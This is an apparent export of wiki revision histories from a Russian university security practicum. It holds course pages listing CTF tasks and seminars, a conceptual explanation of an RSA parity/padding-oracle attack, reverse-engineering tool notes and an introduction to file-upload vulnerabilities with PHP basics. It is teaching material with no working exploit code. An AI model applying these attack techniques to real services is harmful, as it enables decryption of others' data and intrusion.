Практикум связан с курсом «Безопасность компьютерных систем», который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара — т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2023/2024 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате CTF-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько «флагов», выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний («_»).

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится. Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова — возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* <s>[[Практикум_на_ЭВМ_(2023)/Бонусное_задание|Бонусное задание]]</s>
* <s>http://club.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 17.10.2023 23:43)
* <s>http://bank.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://corporate.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://pwnitter.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 24.10.2023 23:59)
* <s>http://hard.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://jpg.tasks.prak.seclab.cs.msu.ru</s> (deadline - 31.10.2023 14:00)
* <s>http://shop.tasks.prak.seclab.cs.msu.ru/</s> (dedline - 23.11.2023 23:59)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [[Media:2023 reverse tasks.zip|Задания по реверсу]] (deadline - 16.11.2023 23:59:59.999999 MSK)
* [[Media:2023 pwn tasks.tar.gz|Задания по бинарной эксплутации]] (deadline - 17.12.2023 23:59:59.999999 MSK)

=== Криптография и криптоанализ ===

* RSA: [https://khashaev.ru/secsem/rsa/#broadcast broadcast], [https://khashaev.ru/secsem/rsa/#common-sense common-sense] (deadline - 1.04.2024 23:53)
* [[Практикум_на_ЭВМ_(2020)/Задание_на_блочные_шифры|Задание на блочные шифры]] (deadline - 24.03.2024 23:53)

== Материалы ==

=== Веб ===

Семинар 1 (11 сентября 2023) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (18 сентября 2023) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (25 сентября 2023) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (2 октября 2023) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (9 октября 2023) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (16 октября 2022) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (23 октября 2020) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (30 октября 2023) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

Семинар 10 (20 ноября 2022) [[Бинарные_уязвимости/Переполнение_стека]]

Семинар 11 (27 ноября 2022) [[Бинарные_уязвимости/ROP]]

=== Криптография и криптоанализ ===

Семинар 1 (22 февраля 2024) [[Криптография/Асимметричная криптография на примере RSA]]

Семинар 2 (29 февраля 2021) [[Криптография/Блочные шифры. Атаки на блочные шифры]]

Семинар 4 (14 марта 2021) [[Криптография/Атака Padding oracle на RSA]]

=== Сетевая безопасность ===

Семинар 5 (4 апреля 2024) [[Сетевая безопасность/Анализ сетевого трафика]]

== Примечания ==
<references/>

Практикум на ЭВМ (2021)

2022-04-18T12:50:26Z

Romankholin94: /* Криптография и криптоанализ */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по четвергам, 12:50
* '''Где''': аудитория 609

Практикум связан с курсом "Безопасность компьютерных систем", который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара - т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2021/2022 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса main_

Флаги нужно сдавать в принимающую систему. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* [[Практикум_на_ЭВМ_(2021)/Бонусное_задание|Бонусное задание]]
* http://club.tasks.prak.seclab.cs.msu.ru/ (deadline - 12.10.2021 15:53)
* http://corporate.tasks.prak.seclab.cs.msu.ru/ (deadline - 23.10.2021 23:59)
* http://bank.tasks.prak.seclab.cs.msu.ru (deadline - 23.10.2021 23:59)
* http://pwnitter.tasks.prak.seclab.cs.msu.ru/ (deadline - 23.10.2021 23:59)
* http://hard.tasks.prak.seclab.cs.msu.ru/ (deadline - 28.10.2021 15:30)
* http://jpg.tasks.prak.seclab.cs.msu.ru/ (deadline - 28.10.2021 15:30)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [https://drive.google.com/file/d/19qIXrbhGyFUAHY-fG3pTlpse4GLLRgr7/view?usp=sharing task 1] nc 91.214.70.136 16971 (deadline - 24.12.2021 12:00)
* [https://drive.google.com/file/d/1Mw_BkNZ-QBkbQrRXLtZLkd3FypMdHp-d/view?usp=sharing task 2] nc 91.214.70.136 16972 (deadline - 24.12.2021 12:00)
* [https://drive.google.com/file/d/1IhG_OD6BDIS4TA_0QXrNxlRqU0xMcV_R/view?usp=sharing task 3] nc 91.214.70.136 16973 (deadline - 24.12.2021 12:00)

* [https://drive.google.com/file/d/1KF992P4Vt3i_7Hr2O6qPCxb5GOzPBXK8/view?usp=sharing task 4] nc tasks.prak.seclab.cs.msu.ru 16974 (deadline - 24.12.2021 12:00)
* [https://drive.google.com/file/d/1ENAVVDKlKIGgELZh6sCaP1wJ4SiOAYwz/view?usp=sharing task 5] nc tasks.prak.seclab.cs.msu.ru 16965 (deadline - 24.12.2021 12:00)
* [https://drive.google.com/file/d/1QcgUUOuKrBB0zce9Er5OCAPIVTQ5jig5/view?usp=sharing task 6] nc tasks.prak.seclab.cs.msu.ru 16966 (deadline - 24.12.2021 12:00)

=== Криптография и криптоанализ ===

* RSA: [https://khashaev.ru/secsem/rsa/#broadcast broadcast], [https://khashaev.ru/secsem/rsa/#common-sense common-sense] (deadline - 12.04.2022 15:53)
* Padding oracle [http://even.tasks.prak.seclab.cs.msu.ru/ even], [http://bleichenbacher.tasks.prak.seclab.cs.msu.ru/ bleichenbacher] (deadline - 03.05.2022 23:59)

== Материалы ==

=== Веб ===

Семинар 1 (9 сентября 2021) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (16 сентября 2021) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (23 сентября 2021) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (30 сентября 2021) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (7 октября 2021) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (14 октября 2021) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (21 октября 2021) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (28 октября 2021) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

Семинар 10 (22 ноября 2021) [[Бинарные_уязвимости/Stack_overflow]]

=== Уязвимости мобильных приложений ===

Семинар 16 декабря 2021 [[Уязвимости_мобильных_приложений/Уязвимости]]

=== Криптография и криптоанализ ===
Семинар 1 (21 февраля 2021) [[Введение в практическую безопасность (2019)/Асимметричная криптография на примере RSA]]

Семинар 2 (5 марта 2021) [[Криптография/Блочные шифры. Атаки на блочные шифры]]

Семинар 3 (14 марта 2021) [[Криптография/Атака Padding oracle на RSA]]

=== Сетевая безопасность ===
Семинар 5 (4 апреля 2022) [[Сетевая безопасность/Анализ сетевого трафика]]

Семинар 6 (11 апреля 2021) [[Сетевая безопасность/Сетевой стек и DNS]]

== Примечания ==
<references/>

Криптография/Атака Padding oracle на RSA

2022-04-01T11:54:43Z

Romankholin94: /* Атака Блехенбахера */

==Мультипликативное свойство RSA==
Пусть E(M) - функция шифрования, N - модуль, X mod Y - остаток от деления X на Y. Тогда:
<pre> E(M1)E(M2) mod N = E(M1M2 mod N)</pre>
Данной свойство очевидно выводится из определения функции шифрования E(M).

==Pairing Oracle==
Разберем следующи пример: пусть есть сервис по заказу яиц. Но он позваляет заказывать только четное количество яиц. Заказы принимаются в зашифрованном RSA виде. Нужно, имея подслушанный зашифрованный текст C, получить его дешифрованный текст M.

Атака выглядит следующим образом: пусть M < N. Можно послать сервису заказ на <code>2M mod N</code> яиц (для этого нужно послать <code>(C*2^e) mod N)</code>. Тогда есть два варинта:
# <code>M > N/2</code>, тогда <code>2M mod N = 2M - N</code> - нечетное число, сервис не принимает заказ
# <code>M <= N/2</code>, тогда <code>2M mod N = 2M</code> - четное число, сервис принимает заказ
Аналогичные суждения можно сделать, домножая C на 2^ie mod N (где i - натуральное число) и, используя метод двоичного поиска, выяснить, чему же равно M.

==PKCS==
Согласно этому стандарту, паддинг текста, длина которого недостаточна для шифрования происходит следующим образом:
<span style="color:#B22222">0002</span><span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d0f95f9836b07907669f2527
eda22e1f80e6e2e4dac062326f5716fca45</span><span style="color:#FF00FF">00</span>4c65616b696e672070617269747920616c6c6f777320666f7
22064656372797074696e6720612077686f6c652052534120656e63727970746564206d6573736167650a

<span style="color:#B22222">0002</span> - первые два байта определяют тип падинга

<span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d
0f95f9836b07907669f2527eda22e1f80e6e2e4dac062326f5716fca45</span> - ненулевые случайные байты

<span style="color:#FF00FF">00</span> - сепаратор, после которого идёт собственно сам текст

==Атака Блехенбахера==
[[Файл:Padding.zip|200px|thumb|left|Описание атаки]]

==Ссылки==
* [https://youtu.be/J8j2LHiKS0I Видео лекции 2021]
* [https://disk.yandex.ru/i/SyvbTKG5PBZVEA Видео лекции 2022]
* [https://docs.google.com/presentation/d/19sGLccnP5IcVm3l3ie3UJZ_nMTxu62SMCFHCd_M2fFc/edit?usp=sharing Презинтация лекции]
* [http://archiv.infsec.ethz.ch/education/fs08/secsem/bleichenbacher98.pdf Оригинал статьи по атаке Блехенбахера]
* [http://secgroup.dais.unive.it/wp-content/uploads/2012/11/Practical-Padding-Oracle-Attacks-on-RSA.html Ещё одна статья про padding oracle]

Файл:Padding.zip

2022-04-01T11:53:18Z

Romankholin94:

Криптография/Атака Padding oracle на RSA

2022-03-31T13:37:14Z

Romankholin94: /* Ссылки */

==Мультипликативное свойство RSA==
Пусть E(M) - функция шифрования, N - модуль, X mod Y - остаток от деления X на Y. Тогда:
<pre> E(M1)E(M2) mod N = E(M1M2 mod N)</pre>
Данной свойство очевидно выводится из определения функции шифрования E(M).

==Pairing Oracle==
Разберем следующи пример: пусть есть сервис по заказу яиц. Но он позваляет заказывать только четное количество яиц. Заказы принимаются в зашифрованном RSA виде. Нужно, имея подслушанный зашифрованный текст C, получить его дешифрованный текст M.

Атака выглядит следующим образом: пусть M < N. Можно послать сервису заказ на <code>2M mod N</code> яиц (для этого нужно послать <code>(C*2^e) mod N)</code>. Тогда есть два варинта:
# <code>M > N/2</code>, тогда <code>2M mod N = 2M - N</code> - нечетное число, сервис не принимает заказ
# <code>M <= N/2</code>, тогда <code>2M mod N = 2M</code> - четное число, сервис принимает заказ
Аналогичные суждения можно сделать, домножая C на 2^ie mod N (где i - натуральное число) и, используя метод двоичного поиска, выяснить, чему же равно M.

==PKCS==
Согласно этому стандарту, паддинг текста, длина которого недостаточна для шифрования происходит следующим образом:
<span style="color:#B22222">0002</span><span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d0f95f9836b07907669f2527
eda22e1f80e6e2e4dac062326f5716fca45</span><span style="color:#FF00FF">00</span>4c65616b696e672070617269747920616c6c6f777320666f7
22064656372797074696e6720612077686f6c652052534120656e63727970746564206d6573736167650a

<span style="color:#B22222">0002</span> - первые два байта определяют тип падинга

<span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d
0f95f9836b07907669f2527eda22e1f80e6e2e4dac062326f5716fca45</span> - ненулевые случайные байты

<span style="color:#FF00FF">00</span> - сепаратор, после которого идёт собственно сам текст

==Атака Блехенбахера==
[https://disk.yandex.ru/i/-_ohdI9lqwgqyg| Ссылка на описание атаки]

==Ссылки==
* [https://youtu.be/J8j2LHiKS0I Видео лекции 2021]
* [https://disk.yandex.ru/i/SyvbTKG5PBZVEA Видео лекции 2022]
* [https://docs.google.com/presentation/d/19sGLccnP5IcVm3l3ie3UJZ_nMTxu62SMCFHCd_M2fFc/edit?usp=sharing Презинтация лекции]
* [http://archiv.infsec.ethz.ch/education/fs08/secsem/bleichenbacher98.pdf Оригинал статьи по атаке Блехенбахера]
* [http://secgroup.dais.unive.it/wp-content/uploads/2012/11/Practical-Padding-Oracle-Attacks-on-RSA.html Ещё одна статья про padding oracle]

Практикум на ЭВМ (2021)

2022-03-31T12:55:01Z

Romankholin94: /* Криптография и криптоанализ */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по четвергам, 12:50
* '''Где''': аудитория 609

Практикум связан с курсом "Безопасность компьютерных систем", который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара - т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2021/2022 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''.
Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса main_

Флаги нужно сдавать в принимающую систему. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* [[Практикум_на_ЭВМ_(2021)/Бонусное_задание|Бонусное задание]]
* http://club.tasks.prak.seclab.cs.msu.ru/ (deadline - 12.10.2021 15:53)
* http://corporate.tasks.prak.seclab.cs.msu.ru/ (deadline - 23.10.2021 23:59)
* http://bank.tasks.prak.seclab.cs.msu.ru (deadline - 23.10.2021 23:59)
* http://pwnitter.tasks.prak.seclab.cs.msu.ru/ (deadline - 23.10.2021 23:59)
* http://hard.tasks.prak.seclab.cs.msu.ru/ (deadline - 28.10.2021 15:30)
* http://jpg.tasks.prak.seclab.cs.msu.ru/ (deadline - 28.10.2021 15:30)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* [https://drive.google.com/file/d/19qIXrbhGyFUAHY-fG3pTlpse4GLLRgr7/view?usp=sharing task 1] nc 91.214.70.136 16971 (deadline - 24.12.2021 12:00)
* [https://drive.google.com/file/d/1Mw_BkNZ-QBkbQrRXLtZLkd3FypMdHp-d/view?usp=sharing task 2] nc 91.214.70.136 16972 (deadline - 24.12.2021 12:00)
* [https://drive.google.com/file/d/1IhG_OD6BDIS4TA_0QXrNxlRqU0xMcV_R/view?usp=sharing task 3] nc 91.214.70.136 16973 (deadline - 24.12.2021 12:00)

* [https://drive.google.com/file/d/1KF992P4Vt3i_7Hr2O6qPCxb5GOzPBXK8/view?usp=sharing task 4] nc tasks.prak.seclab.cs.msu.ru 16974 (deadline - 24.12.2021 12:00)
* [https://drive.google.com/file/d/1ENAVVDKlKIGgELZh6sCaP1wJ4SiOAYwz/view?usp=sharing task 5] nc tasks.prak.seclab.cs.msu.ru 16965 (deadline - 24.12.2021 12:00)
* [https://drive.google.com/file/d/1QcgUUOuKrBB0zce9Er5OCAPIVTQ5jig5/view?usp=sharing task 6] nc tasks.prak.seclab.cs.msu.ru 16966 (deadline - 24.12.2021 12:00)

=== Криптография и криптоанализ ===

* RSA: [https://khashaev.ru/secsem/rsa/#broadcast broadcast], [https://khashaev.ru/secsem/rsa/#common-sense common-sense] (deadline - 12.04.2022 15:53)

== Материалы ==

=== Веб ===

Семинар 1 (9 сентября 2021) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (16 сентября 2021) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (23 сентября 2021) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (30 сентября 2021) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (7 октября 2021) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (14 октября 2021) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (21 октября 2021) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (28 октября 2021) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

Семинар 10 (22 ноября 2021) [[Бинарные_уязвимости/Stack_overflow]]

=== Уязвимости мобильных приложений ===

Семинар 16 декабря 2021 [[Уязвимости_мобильных_приложений/Уязвимости]]

=== Криптография и криптоанализ ===
Семинар 1 (21 февраля 2021) [[Введение в практическую безопасность (2019)/Асимметричная криптография на примере RSA]]

Семинар 2 (5 марта 2021) [[Криптография/Блочные шифры. Атаки на блочные шифры]]

Семинар 3 (14 марта 2021) [[Криптография/Атака Padding oracle на RSA]]

== Примечания ==
<references/>

Бинарные уязвимости/Инструменты поиска бинарных уязвимостей

2021-10-28T08:20:57Z

Romankholin94: /* Примеры с занятия */

== strings ==

Выводит константные строки, которые есть в бинарнике. Строки определяются эвристикой, поэтому часто бывают ложные срабатывания. IDA тоже умеет определять строки.

<pre>
$ strings reverse_example_1
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
MD5_Final
MD5_Init
MD5_Update
libc.so.6
fopen
__stack_chk_fail
fgets
malloc
stderr
fwrite
__sprintf_chk
__libc_start_main
free
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.2.5
OPENSSL_1.0.0
D$(1
T$(dH3
AUATH
D$h1
|$hdH3<%(
x[]A\A]
AWAVA
AUATL
[]A\A]A^A_
%02X
./cd-key.txt
failed to open CD key file
failed to read CD key file
invalid cdkey
Good job!
;*3$"
.shstrtab
.interp
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
</pre>

== strace ==

Выводит трассу системных вызовов. Полезно, чтобы определить, какие файлы читает программа, и как вообще взаимодействует с внешним миром (в том числе сеть).

<pre>
$ strace ./reverse_example_1
...
openat(AT_FDCWD, "./cd-key.txt", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24, ...}) = 0
read(3, "AAAAA-BBBBB-CCCCC-DDDDD\n", 4096) = 24
write(2, "invalid cdkey\n", 14) = 14
exit_group(1) = ?
</pre>

== IDA Pro ==

Интерактивный дизассемблер и декомпилятор.

=== Шорткаты ===
<center style="font-size: 500%">
{{клавиша|F5}}
</center>
==== IDA ====
* {{клавиша|P}} — создать функцию, начиная с текущей позиции курсора
* {{клавиша|F5}} — декомпилировать функцию
* {{клавиша|Enter}} — проследовать по курсору (например, перейти к функции или массиву)
* {{клавиша|Esc}} — назад (противоположность {{клавиша|Enter}})
* {{клавиша|X}} — показать ссылки на то, что под курсором (на функцию, переменную, строку, etc.)
* {{клавиша|C}} — переопределить байты, начиная с курсора, как код.
* {{клавиша|D}} — переопределить байты, начиная с курсора, как данные (последовательные нажатия переключают размер переменной byte-word-dword(-qword))
* {{клавиша|A}} — переопределить байты, начиная с курсора, как строку
* {{клавиша|R}} — переопределить число в инструкции как строку (<code>mov rdx, 335F47414C465Fh</code> -> <code>mov rdx, '3_GALF_'</code>)
Неплохой [https://radare.gitbooks.io/radare2book/content/debugger/migration.html#shortcuts список] из доков по radare2.

==== Hex-Rays ====
* {{клавиша|N}} — переименовать
* {{клавиша|Y}} — поменять тип
** Может показаться, что с помощью {{клавиша|Y}} можно и переименовать, или с помощью {{клавиша|N}} задать тип, однако это не так
* {{клавиша|Enter}} — проследовать по курсору
* {{клавиша|Esc}} — назад
* {{клавиша|Tab}} — перейти к данному месту из декомпилированного в дизассемблированный код и обратно

[https://www.hex-rays.com/products/decompiler/manual/interactive.shtml Полный список] на официальном сайте.

== gdb ==

С '''gdb''' можно познакомиться по любому туториалу в интернете.

Однако в отладке приложений без исходников есть некоторая специфика, и тут могут быть особенно полезные такие команды:

* <code>b * 0x400155</code> - поставить брэйкпоинт на адрес.
* <code>p (char*)$rdi</code> - напечатать как строку содержимое памяти, на которую указывает регистр <code>rdi</code>. См. также [https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI статью про соглашения вызовов на Википедии].
* <code>help x</code> - почитать справку по команде <code>x</code>, которая очень полезна для изучения содержимого памяти.
* <code>x/10i $pc</code> - посмотреть несколько инструкций вперед.
* <code>layout asm</code> - переключиться в псевдографический режим с листингом ассемблерных команд.

== Примеры с занятия ==

Бинарники, которые были рассмотрены на семинаре: [[Media:2019 reverse examples.zip]].

Практикум на ЭВМ (2021)

2021-10-28T08:18:37Z

Romankholin94: /* Материалы */

Практикум на ЭВМ (2021)

2021-10-28T08:17:56Z

Romankholin94: /* Веб */

Веб-безопасность/Уязвимости FileUpload

2021-10-07T12:20:41Z

Romankholin94: /* Подключение файлов */

=Введение=

'''Загрузка файлов пользователями''' - довольно частая часть функциональности веб-приложения (аватарки, хостинг файлов, посылка вложений вместе с сообщениями и т. д.). Небезопасная реализация этого механизма может приводить к очень серьезным уязвимостям.
Загрузка файлов необходима многим сервисам, таким как файлообменники, социальные сети, онлайн-конверторы и редакторы.

Самый простой способ реализации механизма загрузки файлов - просто создавать на файловой системе сервера файл с таким же содержимым как файл, отправленный пользователем (проще говоря, "класть" присланный пользователем файл куда-то на файловую систему сервера). После загрузки файл либо доступен пользователю по прямой ссылке (т. е. определенные URL-адреса отображаются на загруженные файлы и существует URL, обращение к которому ведет к отдаче загруженного файла), либо как то еще обрабатывается веб-приложением. Само веб-приложение во многом состоит из файлов на диске, поэтому добавление файлов на сервер может быть небезопасным, так как (в общем случае) может изменить логику работы приложения.
Соответственно, могут появляться следующие уязвимости:
* Remote Code Execution
* перезапись или удаление файлов
* Local File Read, SSRF
* Denial of Service
* Information Disclosure
* XSS
=PHP=
PHP (PHP: Hypertext Preprocessor) — скриптовый язык общего назначения, интенсивно применяемый для разработки веб-приложений.
==Привет, мир!==
Простейшая программа, выводящая надпись "Привет, мир!":
<syntaxhighlight lang="PHP">
<?php print("Привет, мир!");
</syntaxhighlight>
Каждый скрипт должен начинаться с <code> <?php </code> и желательно (но не всегда обязательно) на <code> ?> </code>. Пример кода, где <code> ?> </code> обязателен:
<syntaxhighlight lang="PHP">
<html>
<head>
<title>Наша первая php страница</title>
</head>
<body>
<h1><?php print("Привет, мир"); ?></h1>
</body>
</html>
</syntaxhighlight>
==Переменные==
В синтаксисе PHP имя переменной записывается латинскими символами, но первым символом всегда должен быть знак доллара $, после чего идёт имя. Не допускается начинать имя переменной с цифры, а также использовать любые значения, кроме букв алфавита и знака подчеркивания.

Правильные переменные:
<syntaxhighlight lang="PHP">
$age
$favorite_color
$name2
</syntaxhighlight>
Неправильные переменные:
<syntaxhighlight lang="PHP">
age
$42
$my-age
</syntaxhighlight>
Переменные бывают нескольких типов:
<syntaxhighlight lang="PHP">
$favorite_color = "green"; // строка
$favorite_number = 42; // целое число
$favorite_float_number = 0.5; // число с плавающей точкой
$favorite_bool = true; // boolean
</syntaxhighlight>
Числа можно складывать, вычитать, делить, умножать опреаторы стандартные, как и во всех языках: +, -, *, /, % - плюсь, минус, умножить, делить (деление не целочисленное), остаток от деления.
==Конкатенация==
Конкатенация - "cклейка" нескольких строчек в одну.
<syntaxhighlight lang="PHP">
<?php
$united_string = "Мой любимый цвет - " . $favorite_color . ", а любимое число - " . $favorite_number;
print($united_string);
</syntaxhighlight>
В коде выше $favorite_number - число. Поэтому данная переменная приводится к типу данных "строка", после чего уже происходит конкатенация.
==Ввод данных==
Данная функциональность редко используется, но нам это нужно было для решения задач на лекии. readline - функция ввода данных:
<syntaxhighlight lang="PHP">
<?php
$line = readline();
print($line);
</syntaxhighlight>
==Массивы==
Массив — структура данных, хранящая набор значений (элементов массива), идентифицируемых по индексу.

В обычных массивах в PHP индекс значение - целое число. Нумеруются массивы с 0:
<syntaxhighlight lang="PHP">
<?php
$fav_shows = ["game of thrones", "american horror story", "walking dead"];
</syntaxhighlight>
В ассоциативных массивах в качестве индекса может использоваться не только число. Например, строка:
<syntaxhighlight lang="PHP">
<?php
$user = ['age' => 42, 'name' => 'Иннокентий', 'fav_shows' => ["game of thrones", "american horror story", "walking dead"] ];
</syntaxhighlight>
==Условный оператор==
Синтаксис: if (условие):
<syntaxhighlight lang="PHP">
if ($gender == "мужчина") {
print("Приветствую тебя, мой Господин!");
} else if ($gender == "женщина") {
print("Приветствую тебя, о Госпожа!");
} else {
print("Не хватает гендеров.");
}
</syntaxhighlight>
* оператор присваивания: =
* операторы сравнения: ==, ===, !=, !==, >, <, <=, >=
* and, or - логические и и или соответственно
==Циклы==
Синтаксис while: while (условие_остановки):
<syntaxhighlight lang="PHP">
<?php
$i = 0;
while ($i < 10) {
print($i);
$i = $i + 1;
}
</syntaxhighlight>
Синтаксис for: for (команда,_выполняемая_до_цикла; условие_осатновки; команда,_выполняемая_в_ конце_каждой_операции):
<syntaxhighlight lang="PHP">
<?php
for ($x = 0; $x < 10; ++$x) {
print($x);
}
</syntaxhighlight>
Для асоциативных массивах есть цикл foreach:
<syntaxhighlight lang="PHP">
<?php
$user = [
'Имя' => 'Евгений',
'Возраст' => '27',
'Род занятий' => 'Программист'
];
foreach ($user as $key => $value) {
print($key . ': ');
print($value . '<br>');
}
</syntaxhighlight>
==Функции==
Синтаксис: имя_функции(аргументы_функции):
<syntaxhighlight lang="PHP">
function is_even($number) {
if ($number % 2 != 0) {
return false;
} else {
return true;
}
}
if (is_even(3)) {
print("3 - четное число");
} else {
print("3 - нечетное число");
}
</syntaxhighlight>
==Подключение файлов==
Чтобы не писать всё в одном файле, используется команда require.
Содержимое файла sub.php:
<syntaxhighlight lang="PHP">
<?php
print("Привет, я содержимое из sub.php!");
</syntaxhighlight>
Содержимое файла index.php:
<syntaxhighlight lang="PHP">
<?php
